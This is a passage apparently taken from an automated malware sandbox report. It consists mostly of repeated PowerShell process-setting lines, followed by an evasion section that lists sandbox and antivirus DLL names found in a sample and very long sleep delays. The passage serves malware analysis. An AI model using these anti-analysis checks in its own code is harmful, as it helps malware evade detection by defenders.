Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe | Binary or memory string: DIR_WATCH.DLL
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe | Binary or memory string: SBIEDLL.DLL
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe | Binary or memory string: API_LOG.DLL
Source: e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe.0.dr | Binary or memory string: EABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/%HS%S%SDELAYS.TMPWPESPY.DLLAVGHOOKX.DLLSBIEDLL.DLLSNXHK.DLLVMCHECK.DLLDIR_WATCH.DLLAPI_LOG.DLLPSTOREC.DLLAVGHOOKA.DLLCMDVRT64.DLLCMDVRT32.DLLIMAGE/JPEGCHAININGMODEAESCHAININGMODEGCMABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=UNKNOWN EXCEPTIONBAD ALLOCATION8
Source: C:\Users\user\Desktop\YYjRtxS70h.exe | Memory allocated: 2A90000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\YYjRtxS70h.exe | Memory allocated: 2CD0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\YYjRtxS70h.exe | Memory allocated: 2B10000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\YYjRtxS70h.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 905
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6871
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1592
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2004
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 7055
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2642
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1518
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 447
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 7875
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1858
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 7484 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 7484 | Thread sleep time: -100000s >= -30000s
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 4124 | Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Desktop\YYjRtxS70h.exe TID: 7480 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7636 | Thread sleep count: 905 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7640 | Thread sleep count: 350 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7652 | Thread sleep count: 131 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7656 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7736 | Thread sleep count: 6871 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7732 | Thread sleep count: 1592 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7772 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7756 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8184 | Thread sleep count: 2004 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8172 | Thread sleep count: 212 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7004 | Thread sleep time: -922337203685477s >= -30000s
